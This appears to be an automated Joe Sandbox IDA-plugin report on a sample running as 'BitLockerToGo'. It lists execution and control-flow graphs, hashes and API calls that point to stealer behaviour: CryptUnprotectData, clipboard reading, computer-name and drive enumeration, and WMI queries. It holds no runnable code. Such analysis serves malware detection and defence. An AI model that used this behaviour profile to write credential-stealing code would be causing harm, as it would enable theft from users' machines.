                                                                              execution_graph 13211 45cbe5 CoInitializeSecurity 13212 47b824 13213 47b848 13212->13213 13214 47b91f FreeLibrary 13213->13214 13215 47b933 13214->13215 13216 47b943 GetComputerNameExA 13215->13216 13218 47b9a0 GetComputerNameExA 13216->13218 13219 47ba90 13218->13219 13105 48ba4c 13107 48ba60 13105->13107 13106 48ba9e 13107->13106 13109 48afd0 LdrInitializeThunk 13107->13109 13109->13106 13110 48b6cd 13111 48b6f0 13110->13111 13114 48afd0 LdrInitializeThunk 13111->13114 13113 48b765 13114->13113 13220 471260 13221 47126e 13220->13221 13223 4712c0 13220->13223 13224 471380 13221->13224 13225 471390 13224->13225 13225->13225 13228 48d3c0 13225->13228 13227 47145f 13229 48d3e0 13228->13229 13229->13229 13230 48d51e 13229->13230 13232 48afd0 LdrInitializeThunk 13229->13232 13230->13227 13232->13230 13115 48d640 13117 48d660 13115->13117 13116 48d76e 13119 48d6be 13117->13119 13121 48afd0 LdrInitializeThunk 13117->13121 13119->13116 13122 48afd0 LdrInitializeThunk 13119->13122 13121->13119 13122->13116 13233 465eef 13234 465ef4 13233->13234 13241 465f9e 13234->13241 13242 48afd0 LdrInitializeThunk 13234->13242 13236 46648e 13237 46a0a0 FreeLibrary FreeLibrary RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13238 46622d 13237->13238 13238->13236 13238->13237 13243 48afd0 LdrInitializeThunk 13238->13243 13239 466203 CryptUnprotectData 13239->13236 13239->13238 13241->13238 13241->13239 13242->13241 13243->13238 13244 4817b8 13245 4817bd 13244->13245 13246 4817f3 GetSystemMetrics GetSystemMetrics 13245->13246 13247 481832 13246->13247 13248 47e6f6 CoSetProxyBlanket 13129 485e5d 13133 48cbc0 13129->13133 13132 485ea0 13134 485e75 GetUserDefaultUILanguage 13133->13134 13134->13132 13249 4587b0 13250 4587bb 13249->13250 13251 458820 ExitProcess 13250->13251 13261 487500 13250->13261 13253 4587ce 13254 45881b 13253->13254 13255 4587da GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW GetForegroundWindow 13253->13255 13279 48af40 13254->13279 13256 45880a 13255->13256 13256->13254 13278 45cbb0 CoInitializeEx 13256->13278 13263 487510 13261->13263 13262 48af60 3 API calls 13262->13263 13263->13262 13267 487624 13263->13267 13282 48afd0 LdrInitializeThunk 13263->13282 13265 48798a 13266 4897a0 RtlFreeHeap 13265->13266 13269 4879a3 13266->13269 13267->13265 13283 489a60 13267->13283 13269->13253 13271 48af60 3 API calls 13272 48766a 13271->13272 13272->13271 13273 4897a0 RtlFreeHeap 13272->13273 13274 4879b0 13272->13274 13276 48afd0 LdrInitializeThunk 13272->13276 13277 48798e 13272->13277 13273->13272 13275 4897a0 RtlFreeHeap 13274->13275 13275->13277 13276->13272 13287 489b90 13277->13287 13293 48c790 13279->13293 13281 48af45 FreeLibrary 13281->13251 13282->13263 13284 489b2e 13283->13284 13285 489a71 13283->13285 13284->13272 13285->13284 13291 48afd0 LdrInitializeThunk 13285->13291 13288 489b9a 13287->13288 13290 489c0e 13287->13290 13288->13290 13292 48afd0 LdrInitializeThunk 13288->13292 13290->13265 13291->13284 13292->13290 13294 48c799 13293->13294 13294->13281 13135 45e913 13138 4623e0 13135->13138 13137 45e919 13145 4623fa 13138->13145 13139 462401 13139->13137 13141 4897a0 RtlFreeHeap 13141->13145 13142 48afd0 LdrInitializeThunk 13142->13145 13145->13139 13145->13141 13145->13142 13146 45aec0 13145->13146 13150 48d070 13145->13150 13154 48d7c0 13145->13154 13149 45af50 13146->13149 13148 45af75 13148->13145 13149->13148 13160 48af60 13149->13160 13152 48d090 13150->13152 13151 48d1ce 13151->13145 13152->13151 13177 48afd0 LdrInitializeThunk 13152->13177 13156 48d7e0 13154->13156 13155 48d83e 13157 48d8ee 13155->13157 13179 48afd0 LdrInitializeThunk 13155->13179 13156->13155 13178 48afd0 LdrInitializeThunk 13156->13178 13157->13145 13161 48af78 13160->13161 13162 48afaf 13160->13162 13163 48afa4 13160->13163 13164 48af86 13160->13164 13165 48afa0 13160->13165 13161->13162 13161->13164 13161->13165 13172 4897a0 13162->13172 13169 489780 13163->13169 13168 48af8b RtlReAllocateHeap 13164->13168 13165->13149 13168->13165 13175 48c7b0 13169->13175 13171 48978a RtlAllocateHeap 13171->13165 13173 4897cb RtlFreeHeap 13172->13173 13174 4897b3 13172->13174 13173->13165 13174->13165 13174->13174 13176 48c7d0 13175->13176 13176->13171 13176->13176 13177->13151 13178->13155 13179->13157 13180 45da13 13181 45da19 13180->13181 13182 45da28 CoUninitialize 13181->13182 13183 45da60 13182->13183 13295 45e6f2 13296 45e700 13295->13296 13299 45e74e 13296->13299 13363 48afd0 LdrInitializeThunk 13296->13363 13297 45e7ee 13315 4732a0 13297->13315 13299->13297 13364 48afd0 LdrInitializeThunk 13299->13364 13302 45e82d 13324 473960 13302->13324 13304 45e84d 13330 473c00 13304->13330 13306 45e86d 13338 475730 13306->13338 13312 45e89f 13365 481190 13312->13365 13323 473300 13315->13323 13316 473406 13316->13302 13317 4736d7 13317->13316 13376 471620 13317->13376 13319 473521 13319->13316 13319->13317 13320 4736c1 GetLogicalDrives 13319->13320 13322 48d3c0 LdrInitializeThunk 13320->13322 13321 48d3c0 LdrInitializeThunk 13321->13319 13322->13317 13323->13316 13323->13317 13323->13319 13323->13321 13323->13323 13329 473a00 13324->13329 13325 473aff 13399 46f710 13325->13399 13326 473bd4 13326->13304 13329->13325 13329->13326 13403 48dd00 13329->13403 13331 473c0e 13330->13331 13415 48d930 13331->13415 13333 473aff 13337 46f710 3 API calls 13333->13337 13334 48dd00 3 API calls 13336 473ac7 13334->13336 13335 473bd4 13335->13306 13336->13333 13336->13334 13336->13335 13337->13335 13343 475a67 13338->13343 13344 45e88d 13338->13344 13347 475aa3 13338->13347 13349 475756 13338->13349 13339 48dd00 3 API calls 13339->13349 13340 48d930 LdrInitializeThunk 13340->13349 13341 48af60 3 API calls 13341->13349 13430 48da40 13343->13430 13350 475e00 13344->13350 13346 48da40 3 API calls 13346->13347 13347->13346 13348 48afd0 LdrInitializeThunk 13348->13349 13349->13339 13349->13340 13349->13341 13349->13343 13349->13344 13349->13347 13349->13348 13420 48e3c0 13349->13420 13351 475e20 13350->13351 13352 475e5e 13351->13352 13444 48afd0 LdrInitializeThunk 13351->13444 13353 489780 RtlAllocateHeap 13352->13353 13357 45e896 13352->13357 13355 475ebb 13353->13355 13359 475f0e 13355->13359 13445 48afd0 LdrInitializeThunk 13355->13445 13356 4897a0 RtlFreeHeap 13356->13357 13360 4760d0 13357->13360 13359->13356 13359->13359 13446 4760f0 13360->13446 13362 4760d9 13362->13312 13363->13299 13364->13297 13366 48119e 13365->13366 13367 4811a8 OpenClipboard 13366->13367 13368 4811c2 13367->13368 13369 45e8f1 13368->13369 13370 4811cd GetWindowLongW GetClipboardData 13368->13370 13371 481209 GlobalLock 13370->13371 13372 481204 13370->13372 13375 481228 13371->13375 13373 481368 CloseClipboard 13372->13373 13373->13369 13374 481359 GlobalUnlock 13374->13373 13375->13374 13391 48d230 13376->13391 13378 471663 13379 489780 RtlAllocateHeap 13378->13379 13385 471d90 13378->13385 13380 4716bc 13379->13380 13389 471726 13380->13389 13395 48afd0 LdrInitializeThunk 13380->13395 13381 471d18 13383 4897a0 RtlFreeHeap 13381->13383 13386 471d28 13383->13386 13384 489780 RtlAllocateHeap 13384->13389 13385->13316 13386->13385 13397 48afd0 LdrInitializeThunk 13386->13397 13389->13381 13389->13384 13390 4897a0 RtlFreeHeap 13389->13390 13396 48afd0 LdrInitializeThunk 13389->13396 13390->13389 13393 48d250 13391->13393 13392 48d36e 13392->13378 13393->13392 13398 48afd0 LdrInitializeThunk 13393->13398 13395->13380 13396->13389 13397->13386 13398->13392 13400 46f740 13399->13400 13400->13400 13401 471620 3 API calls 13400->13401 13402 46f786 13401->13402 13402->13326 13404 48dd10 13403->13404 13406 48dd6e 13404->13406 13413 48afd0 LdrInitializeThunk 13404->13413 13405 48e028 13405->13329 13406->13405 13408 489780 RtlAllocateHeap 13406->13408 13409 48de16 13408->13409 13412 48de8e 13409->13412 13414 48afd0 LdrInitializeThunk 13409->13414 13410 4897a0 RtlFreeHeap 13410->13405 13412->13410 13412->13412 13413->13406 13414->13412 13416 48d950 13415->13416 13418 48da0f 13416->13418 13419 48afd0 LdrInitializeThunk 13416->13419 13418->13336 13419->13418 13423 48e3d1 13420->13423 13421 48e50e 13422 48e71d 13421->13422 13425 489780 RtlAllocateHeap 13421->13425 13422->13349 13423->13421 13440 48afd0 LdrInitializeThunk 13423->13440 13426 48e595 13425->13426 13428 48e65e 13426->13428 13441 48afd0 LdrInitializeThunk 13426->13441 13427 4897a0 RtlFreeHeap 13427->13422 13428->13427 13431 48da50 13430->13431 13432 48daae 13431->13432 13442 48afd0 LdrInitializeThunk 13431->13442 13433 48dcf0 13432->13433 13435 489780 RtlAllocateHeap 13432->13435 13433->13347 13436 48db37 13435->13436 13439 48dbbf 13436->13439 13443 48afd0 LdrInitializeThunk 13436->13443 13437 4897a0 RtlFreeHeap 13437->13433 13439->13437 13440->13421 13441->13428 13442->13432 13443->13439 13444->13352 13445->13359 13447 476130 13446->13447 13447->13447 13459 4897e0 13447->13459 13450 489a60 LdrInitializeThunk 13452 4761a2 13450->13452 13451 489b90 LdrInitializeThunk 13453 4767cd 13451->13453 13456 4761ae 13452->13456 13457 4762d9 13452->13457 13469 489ef0 13452->13469 13453->13362 13456->13451 13456->13456 13457->13456 13458 476424 13457->13458 13477 489e30 13457->13477 13458->13362 13460 489800 13459->13460 13461 48985e 13460->13461 13481 48afd0 LdrInitializeThunk 13460->13481 13462 476196 13461->13462 13464 489780 RtlAllocateHeap 13461->13464 13462->13450 13467 4898cc 13464->13467 13465 48993e 13466 4897a0 RtlFreeHeap 13465->13466 13466->13462 13467->13465 13482 48afd0 LdrInitializeThunk 13467->13482 13471 489f40 13469->13471 13470 48a6be 13470->13452 13473 489f9e 13471->13473 13483 48afd0 LdrInitializeThunk 13471->13483 13473->13470 13474 48a642 13473->13474 13476 48afd0 LdrInitializeThunk 13473->13476 13474->13470 13484 48afd0 LdrInitializeThunk 13474->13484 13476->13473 13478 489e50 13477->13478 13480 489ebe 13478->13480 13485 48afd0 LdrInitializeThunk 13478->13485 13480->13457 13481->13461 13482->13465 13483->13473 13484->13470 13485->13480 13184 486950 13188 486980 CoCreateInstance 13184->13188 13186 486bd9 SysAllocString 13191 486c4e 13186->13191 13187 487116 13190 487126 GetVolumeInformationW 13187->13190 13188->13186 13188->13187 13199 48713d 13190->13199 13192 486c5d CoSetProxyBlanket 13191->13192 13193 487103 SysFreeString 13191->13193 13194 4870f9 13192->13194 13195 486c7d SysAllocString 13192->13195 13193->13187 13194->13193 13197 486d60 13195->13197 13197->13197 13198 486d95 SysAllocString 13197->13198 13200 486dbd 13198->13200 13201 4870e4 SysFreeString SysFreeString 13200->13201 13202 4870d3 13200->13202 13203 486e08 VariantInit 13200->13203 13201->13194 13202->13201 13205 486e50 13203->13205 13204 4870c2 VariantClear 13204->13202 13205->13204 13486 486730 13487 486740 13486->13487 13487->13487 13490 4867ce 13487->13490 13495 48afd0 LdrInitializeThunk 13487->13495 13488 4868ee 13490->13488 13492 48686e 13490->13492 13494 48afd0 LdrInitializeThunk 13490->13494 13492->13488 13496 48afd0 LdrInitializeThunk 13492->13496 13494->13492 13495->13490 13496->13488 13206 45d15a 13207 45d1e0 13206->13207 13209 45d22e 13207->13209 13210 48afd0 LdrInitializeThunk 13207->13210 13210->13209
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $"$#$$$&$'$($($($)$*$,$.$/$0$2$2$3$4$4$5$6$8$8$9$:$:$;$;$<$>$>$>$?$?$D$D$D$K$M$M$M$N$O$O$O$S$V$V$W$W$[$]$`$a$b$d$f$h$h$k$k$m$o$o$q$q$r$r$s$t$u$w$w$x$z
                                                                              • API String ID: 0-2700217057
                                                                              • Opcode ID: 72caa9be55b4e81f5caf3915cbd3e050fa322ca5e25f87d827155404772df552
                                                                              • Instruction ID: f855725e839ded0dad3618c20b79dec3401d2358900879b8c26ed75a58782911
                                                                              • Opcode Fuzzy Hash: 72caa9be55b4e81f5caf3915cbd3e050fa322ca5e25f87d827155404772df552
                                                                              • Instruction Fuzzy Hash: 50039C3050C7C18EC335CB38849439FBBE1AB96324F188A6EE4E9873D2D6798545CB5B

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 424 486950-486972 425 486980-4869be 424->425 425->425 426 4869c0-4869d3 425->426 427 4869e0-486a31 426->427 427->427 428 486a33-486a73 427->428 429 486a80-486aa5 428->429 429->429 430 486aa7-486ac6 429->430 432 486acc-486ad5 430->432 433 486b82-486bd3 CoCreateInstance 430->433 434 486ae0-486b20 432->434 435 486bd9-486c0a 433->435 436 487116-48713b call 48cbc0 GetVolumeInformationW 433->436 434->434 439 486b22-486b3a 434->439 437 486c10-486c24 435->437 443 48713d-487141 436->443 444 487145-487147 436->444 437->437 440 486c26-486c57 SysAllocString 437->440 442 486b40-486b6f 439->442 450 486c5d-486c77 CoSetProxyBlanket 440->450 451 487103-487112 SysFreeString 440->451 442->442 445 486b71-486b7e 442->445 443->444 447 487167-48716e 444->447 445->433 448 48717a-48718e 447->448 449 487170-487177 447->449 452 487190-4871a4 448->452 449->448 453 4870f9-4870ff 450->453 454 486c7d-486c97 450->454 451->436 452->452 455 4871a6-4871da 452->455 453->451 456 486ca0-486cde 454->456 457 4871e0-487227 455->457 456->456 458 486ce0-486d5f SysAllocString 456->458 457->457 459 487229-487259 call 46e500 457->459 460 486d60-486d93 458->460 464 487260-487268 459->464 460->460 462 486d95-486dc6 SysAllocString 460->462 467 486dcc-486dee 462->467 468 4870e4-4870f6 SysFreeString * 2 462->468 464->464 466 48726a-48726c 464->466 469 487150-487161 466->469 470 487272-487282 call 4580d0 466->470 475 4870da-4870e0 467->475 476 486df4-486df7 467->476 468->453 469->447 473 487287-48728e 469->473 470->469 475->468 476->475 477 486dfd-486e02 476->477 477->475 478 486e08-486e4e VariantInit 477->478 479 486e50-486ea6 478->479 479->479 480 486ea8-486eb6 479->480 481 486eba-486ebc 480->481 482 4870c2-4870d3 VariantClear 481->482 483 486ec2-486ec8 481->483 482->475 483->482 484 486ece-486eda 483->484 486 486edc-486ee1 484->486 487 486f1d 484->487 489 486efc-486f00 486->489 488 486f1f-486f3d call 458050 487->488 497 486f43-486f57 488->497 498 487074-487085 488->498 491 486ef0 489->491 492 486f02-486f0b 489->492 494 486ef1-486efa 491->494 495 486f0d-486f10 492->495 496 486f12-486f16 492->496 494->488 494->489 495->494 496->494 499 486f18-486f1b 496->499 497->498 500 486f5d-486f63 497->500 501 48708c-487094 498->501 502 487087 498->502 499->494 503 486f70-486f7a 500->503 504 48709b-4870be call 458080 call 458060 501->504 505 487096 501->505 502->501 506 486f7c-486f81 503->506 507 486f90-486f96 503->507 504->482 505->504 509 487020-487024 506->509 510 486f98-486f9b 507->510 511 486fb5-486fc7 507->511 517 487026-48702e 509->517 510->511 513 486f9d-486fb3 510->513 514 486fc9-486fcc 511->514 515 48703a-487043 511->515 513->509 514->515 520 486fce-48701f 514->520 515->517 519 487045-487048 515->519 517->498 518 487030-487032 517->518 518->503 522 487038 518->522 523 48704a-48706e 519->523 524 487070-487072 519->524 520->509 522->498 523->509 524->509
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(0049068C,00000000,00000001,0049067C), ref: 00486BC8
                                                                              • SysAllocString.OLEAUT32(9CC89ABC), ref: 00486C27
                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00486C6F
                                                                              • SysAllocString.OLEAUT32(DA68D850), ref: 00486CE5
                                                                              • SysAllocString.OLEAUT32(4C0E4A1A), ref: 00486D9A
                                                                              • VariantInit.OLEAUT32 ref: 00486E0D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                              • String ID: #b:d$:f4x$>? !$\$_n$eF}X$yz$1q5$
                                                                              • API String ID: 65563702-121217271
                                                                              • Opcode ID: 230883d210a754b78815678d7b70d9a19f49edd4fe69013b8ee4e8d2c80050a8
                                                                              • Instruction ID: ecfa94fa8882405c972a35337ebfc6326c0405000f3a25aaa043d9622a307ff2
                                                                              • Opcode Fuzzy Hash: 230883d210a754b78815678d7b70d9a19f49edd4fe69013b8ee4e8d2c80050a8
                                                                              • Instruction Fuzzy Hash: 453231726083518BD314DF28C8917AFBBE1EBC5314F248E2EE5A19B391D778D905CB86

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 525 45aec0-45af48 526 45af50-45af59 525->526 526->526 527 45af5b-45af6e 526->527 529 45af75-45af77 527->529 530 45af7c-45b1a3 527->530 531 45b5c6-45b5cd 529->531 532 45b1b0-45b1ee 530->532 532->532 533 45b1f0-45b1fb 532->533 534 45b1ff-45b20f 533->534 535 45b4c4-45b4c9 534->535 536 45b306-45b30f 534->536 537 45b486-45b4a6 call 48cbc0 534->537 538 45b2c6-45b2d6 534->538 539 45b2c0 534->539 540 45b540-45b55d 534->540 541 45b580-45b587 534->541 542 45b44d-45b45f 534->542 543 45b5ce 534->543 544 45b5d5-45b5dc 534->544 545 45b216-45b2af call 457f30 534->545 546 45b316-45b31d 534->546 547 45b4d0-45b4ec 534->547 548 45b590-45b597 534->548 549 45b512 534->549 550 45b59d 534->550 551 45b2dd-45b2fd call 48cbc0 534->551 552 45b31f-45b32b 534->552 553 45b518-45b537 534->553 554 45b565-45b570 534->554 555 45b426-45b446 534->555 556 45b466-45b46d 534->556 557 45b5a6-45b5af 534->557 558 45b3e3-45b3f6 534->558 559 45b5e2-45b5eb 534->559 560 45b4af-45b4c2 534->560 561 45b474-45b47d 534->561 562 45b577 534->562 563 45b5b0-45b5b7 534->563 564 45b5f0-45b5f2 534->564 565 45b4f3-45b50b call 48af60 534->565 566 45b3fd-45b41d call 48cbc0 534->566 567 45b5bd 534->567 535->537 535->538 535->539 535->541 535->543 535->544 535->547 535->548 535->550 535->551 535->557 535->559 535->561 535->562 535->563 535->564 535->566 535->567 570 45b5fa-45b5ff 535->570 536->535 536->537 536->538 536->539 536->540 536->541 536->542 536->543 536->544 536->546 536->547 536->548 536->549 536->550 536->551 536->552 536->553 536->554 536->555 536->556 536->557 536->558 536->559 536->560 536->561 536->562 536->563 536->564 536->565 536->566 536->567 536->570 537->560 538->543 538->544 538->551 538->559 538->564 538->567 538->570 540->554 541->548 542->535 542->537 542->538 542->539 542->540 542->541 542->543 542->544 542->547 542->548 542->549 542->550 542->551 542->553 542->554 542->556 542->557 542->559 542->560 542->561 542->562 542->563 542->564 542->565 542->566 542->567 542->570 543->544 544->559 545->535 545->536 545->537 545->538 545->539 545->540 545->541 545->542 545->543 545->544 545->546 545->547 545->548 545->549 545->550 545->551 545->552 545->553 545->554 545->555 545->556 545->557 545->558 545->559 545->560 545->561 545->562 545->563 545->564 545->565 545->566 545->567 545->570 568 45b366-45b381 546->568 547->535 547->537 547->538 547->539 547->540 547->541 547->543 547->544 547->548 547->549 547->550 547->551 547->553 547->554 547->557 547->559 547->561 547->562 547->563 547->564 547->565 547->566 547->567 547->570 548->550 549->553 550->557 551->536 569 45b330-45b35e 552->569 553->540 554->537 554->538 554->539 554->541 554->543 554->544 554->547 554->548 554->550 554->551 554->557 554->559 554->561 554->562 554->563 554->564 554->566 554->567 554->570 555->535 555->537 555->538 555->539 555->540 555->541 555->542 555->543 555->544 555->547 555->548 555->549 555->550 555->551 555->553 555->554 555->556 555->557 555->559 555->560 555->561 555->562 555->563 555->564 555->565 555->566 555->567 555->570 556->537 556->538 556->539 556->541 556->543 556->544 556->548 556->550 556->551 556->557 556->559 556->561 556->563 556->564 556->566 556->567 556->570 557->563 558->538 558->539 558->543 558->544 558->550 558->551 558->557 558->559 558->563 558->564 558->566 558->567 558->570 559->564 560->547 561->537 562->541 563->567 564->570 565->535 565->537 565->538 565->539 565->540 565->541 565->543 565->544 565->547 565->548 565->549 565->550 565->551 565->553 565->554 565->557 565->559 565->561 565->562 565->563 565->564 565->566 565->567 565->570 566->555 567->531 578 45b390-45b3bf 568->578 569->569 577 45b360-45b363 569->577 570->531 577->568 578->578 593 45b3c1-45b3dc 578->593 593->535 593->537 593->538 593->539 593->540 593->541 593->542 593->543 593->544 593->547 593->548 593->549 593->550 593->551 593->553 593->554 593->555 593->556 593->557 593->558 593->559 593->560 593->561 593->562 593->563 593->564 593->565 593->566 593->567 593->570
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                              • API String ID: 0-751836444
                                                                              • Opcode ID: 08cde2f563782f099d4cdd0886a625a3eb76995293a53975246304204ca6f674
                                                                              • Instruction ID: f4b12276fecbfecfe76a1e48bb24331f8fea06872b2b6b5b5d97e79255cd4c73
                                                                              • Opcode Fuzzy Hash: 08cde2f563782f099d4cdd0886a625a3eb76995293a53975246304204ca6f674
                                                                              • Instruction Fuzzy Hash: 8A1248B1100B01DFD3348F65E995B97BBF1FB55314F008A2DD5AA8BA90C774A849CF94
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "'QQ$I\] $`c^Q$`l"($a}eb$dosh$ye}z
                                                                              • API String ID: 0-3808399728
                                                                              • Opcode ID: 707b1d2be32c108fb4043fcd26a5819e930746b22a361ef14051408116ce2ffe
                                                                              • Instruction ID: 5e29ebb6e0e49f297d7499081b05086009edbe9e6c3c68f3efed8d50f5f07d54
                                                                              • Opcode Fuzzy Hash: 707b1d2be32c108fb4043fcd26a5819e930746b22a361ef14051408116ce2ffe
                                                                              • Instruction Fuzzy Hash: 1B6214B19093408FC720DF29D8957ABB7E1EF95314F154A2EE4C987391EB389805CB9B

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 808 47b824-47b87b call 48cbc0 812 47b880-47b8c5 808->812 812->812 813 47b8c7-47b8d1 812->813 814 47b8d3-47b8df 813->814 815 47b8ed 813->815 816 47b8e0-47b8e9 814->816 817 47b8f1-47b900 815->817 816->816 818 47b8eb 816->818 819 47b902-47b90b 817->819 820 47b91d 817->820 818->817 821 47b910-47b919 819->821 822 47b91f-47b994 FreeLibrary call 48cbc0 GetComputerNameExA 820->822 821->821 823 47b91b 821->823 827 47b9a0-47b9cc 822->827 823->822 827->827 828 47b9ce-47b9d8 827->828 829 47b9fd 828->829 830 47b9da-47b9e5 828->830 831 47ba01-47ba10 829->831 832 47b9f0-47b9f9 830->832 833 47ba12-47ba1b 831->833 834 47ba2d 831->834 832->832 835 47b9fb 832->835 836 47ba20-47ba29 833->836 837 47ba2f-47ba82 GetComputerNameExA 834->837 835->831 836->836 838 47ba2b 836->838 839 47ba90-47badb 837->839 838->837 839->839 840 47badd-47bae7 839->840 841 47bafb-47bb08 840->841 842 47bae9 840->842 844 47bb2b-47bb86 841->844 845 47bb0a-47bb11 841->845 843 47baf0-47baf9 842->843 843->841 843->843 848 47bb90-47bbdf 844->848 846 47bb20-47bb29 845->846 846->844 846->846 848->848 849 47bbe1-47bbeb 848->849 850 47bc0d 849->850 851 47bbed-47bbf8 849->851 853 47bc11-47bc1e 850->853 852 47bc00-47bc09 851->852 852->852 854 47bc0b 852->854 855 47bc20-47bc27 853->855 856 47bc3b-47bc94 call 48cbc0 853->856 854->853 857 47bc30-47bc39 855->857 861 47bca0-47bcd6 856->861 857->856 857->857 861->861 862 47bcd8-47bce2 861->862 863 47bce4-47bceb 862->863 864 47bcfb-47bd16 862->864 865 47bcf0-47bcf9 863->865 866 47be76-47beb2 864->866 867 47bd1c-47bd23 864->867 865->864 865->865 869 47bec0-47bee3 866->869 868 47bd30-47bd3a 867->868 870 47bd50-47bd56 868->870 871 47bd3c-47bd41 868->871 869->869 872 47bee5-47bef5 869->872 874 47bd90-47bda0 870->874 875 47bd58-47bd5b 870->875 873 47be10-47be26 871->873 876 47bef7-47beff 872->876 877 47bf0b-47bf0e call 47f910 872->877 883 47be2a-47be30 873->883 880 47bda6-47bda9 874->880 881 47be3c-47be44 874->881 875->874 878 47bd5d-47bd82 875->878 879 47bf00-47bf09 876->879 887 47bf13-47bf2f 877->887 878->873 879->877 879->879 880->881 886 47bdaf-47be03 880->886 884 47be46-47be48 881->884 885 47be4a-47be4d 881->885 883->866 888 47be32-47be34 883->888 884->883 889 47be72-47be74 885->889 890 47be4f-47be70 885->890 886->873 888->868 891 47be3a 888->891 889->873 890->873 891->866
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?), ref: 0047B92D
                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0047B967
                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0047BA53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName$FreeLibrary
                                                                              • String ID: 1ako$MCIZ$iJ$x^T1$x^T1
                                                                              • API String ID: 2243422189-3557654919
                                                                              • Opcode ID: 8b416d4aa90c12023953fcbac34bc9b350b4be492ac514c03eb8d3f86ff73edf
                                                                              • Instruction ID: 91d9614ebf53b3cfd3a1b4514c1b200957fc8ab57354ae047abcaa5ca3094af7
                                                                              • Opcode Fuzzy Hash: 8b416d4aa90c12023953fcbac34bc9b350b4be492ac514c03eb8d3f86ff73edf
                                                                              • Instruction Fuzzy Hash: 2AE1D2615083D18AD7358B3984507EBBBD1DFE2304F18C9AED4CD97382DB79490ACBA6

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
